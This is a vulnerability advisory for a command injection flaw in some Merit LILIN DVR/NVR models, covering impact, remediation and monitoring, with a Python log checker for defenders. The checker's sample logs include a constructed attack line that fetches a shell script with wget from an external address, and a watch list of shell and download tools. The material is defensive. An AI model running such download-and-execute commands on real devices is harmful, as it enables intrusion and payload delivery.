CVE-2026-0854

Certain · Certain Multiple Products

A high-severity OS command injection vulnerability has been identified in certain DVR/NVR models from Merit LILIN.

Executive summary

A high-severity OS command injection vulnerability has been identified in certain DVR/NVR models from Merit LILIN. This flaw allows an authenticated remote attacker to take full control of the affected security devices, potentially leading to the compromise of video surveillance data, disruption of security monitoring, and unauthorized access to the internal network.

Vulnerability

The vulnerability exists within a component of the device's software that fails to properly sanitize user-supplied input before passing it to the underlying operating system. A remote attacker who has successfully authenticated to the device can submit specially crafted input containing arbitrary OS commands. These commands are then executed with the privileges of the application, which may be root or another high-privileged user, resulting in a complete compromise of the device.

Business impact

This vulnerability is rated as High severity with a CVSS score of 8.8. Successful exploitation could lead to significant business disruption and security risks. An attacker could gain complete control over the affected DVR/NVR systems, resulting in a loss of confidentiality (viewing or exfiltrating sensitive video feeds), integrity (tampering with or deleting recordings), and availability (disabling the device and security monitoring). Since these devices are often connected to the internal network, a compromised system could serve as a pivot point for attackers to launch further attacks against other critical assets within the organization.

Remediation

Immediate Action:

  • Identify all affected DVR/NVR devices within the environment.
  • Apply the security updates provided by the vendor to all identified devices immediately to patch the vulnerability.
  • Review device access logs for any unauthorized or suspicious authentication events that may have occurred prior to patching.

Proactive Monitoring:

  • Monitor device system logs for unusual or suspicious command executions, particularly processes spawned by the device's web application that invoke shells or download tools such as sh, bash, wget, or curl.
  • Analyze network traffic for unexpected outbound connections from the DVR/NVR devices to unknown external IP addresses.
  • Implement enhanced logging and alerting for authentication failures and successful logins from untrusted network zones.
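A minimal checker for the three monitoring points above, run over constructed sample log lines; this is an added example and not part of this advisory or the vendor's tooling. The syslog-style record format, the `httpd` process name and the 10.0.0.0/8 trusted range are assumptions.

```python
import ipaddress
import os
import re
import shlex

# Constructed sample lines (not captured from a real device); the syslog-style
# format, the exec/out conn/auth record shapes and the process names are assumptions.
SAMPLE_LOGS = """\
Jan 12 10:01:03 dvr01 httpd[412]: auth ok user=admin src=10.0.5.20
Jan 12 10:01:07 dvr01 httpd[412]: exec pid=413 cmd="/bin/sh -c wget http://203.0.113.7/x.sh -O /tmp/x.sh"
Jan 12 10:01:08 dvr01 kernel: out conn proto=tcp src=10.0.5.9:51022 dst=203.0.113.7:80
Jan 12 10:02:00 dvr01 ntpd[201]: exec pid=222 cmd="/usr/sbin/ntpdate pool.ntp.org"
Jan 12 10:02:30 dvr01 httpd[412]: auth fail user=admin src=198.51.100.4
"""

SHELL_BINARIES = {"sh", "bash", "wget", "curl"}       # the advisory's watch list
TRUSTED_NETS = [ipaddress.ip_network("10.0.0.0/8")]   # assumed internal/management ranges
WEB_PROCESS = "httpd"                                  # assumed name of the device's web service

EXEC_RE = re.compile(r'(?P<proc>\w+)\[\d+\]: exec pid=\d+ cmd="(?P<cmd>[^"]*)"')
CONN_RE = re.compile(r'out conn proto=\w+ src=[\d.]+:\d+ dst=(?P<dst>[\d.]+):(?P<port>\d+)')
AUTH_RE = re.compile(r'auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<src>[\d.]+)')


def is_trusted(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETS)


def analyze(log_text: str) -> list[dict]:
    """Return one finding per line that matches one of the advisory's monitoring points."""
    findings = []
    for line in log_text.splitlines():
        if m := EXEC_RE.search(line):
            # Only processes spawned by the web service matter: that is where injected input lands.
            if m.group("proc") == WEB_PROCESS:
                binaries = {os.path.basename(tok) for tok in shlex.split(m.group("cmd"))}
                if hits := binaries & SHELL_BINARIES:
                    findings.append({"type": "shell_exec_from_web", "detail": sorted(hits)})
        elif m := CONN_RE.search(line):
            # Outbound connection to an address outside the trusted ranges.
            if not is_trusted(m.group("dst")):
                findings.append({"type": "unexpected_outbound", "detail": m.group("dst")})
        elif m := AUTH_RE.search(line):
            # Any login attempt, successful or not, that originates from an untrusted zone.
            if not is_trusted(m.group("src")):
                findings.append({"type": f"auth_{m.group('result')}_untrusted", "detail": m.group("src")})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOGS):
        print(finding)
```

In production the regexes would be replaced with the device's actual log schema and the trusted ranges with the site's management networks.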

Compensating Controls:

  • If immediate patching is not feasible, restrict network access to the device's management interface to a limited set of trusted IP addresses or a dedicated management VLAN.
  • Ensure all administrative accounts on the devices use strong, unique passwords and multi-factor authentication, if available, to make the authentication prerequisite more difficult for an attacker to achieve.
  • Place the devices on a segmented network, isolated from critical corporate resources, to limit the potential impact of a compromise.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the high CVSS score of 8.8 and the potential for complete system compromise, this vulnerability presents a significant risk to the organization. While it is not currently listed on the CISA KEV list, it should be treated with high priority. We strongly recommend that the vendor-supplied patches be applied to all affected devices immediately. If patching cannot be performed right away, the compensating controls, especially network segmentation and access restriction, must be implemented without delay to reduce the attack surface and mitigate the risk of exploitation.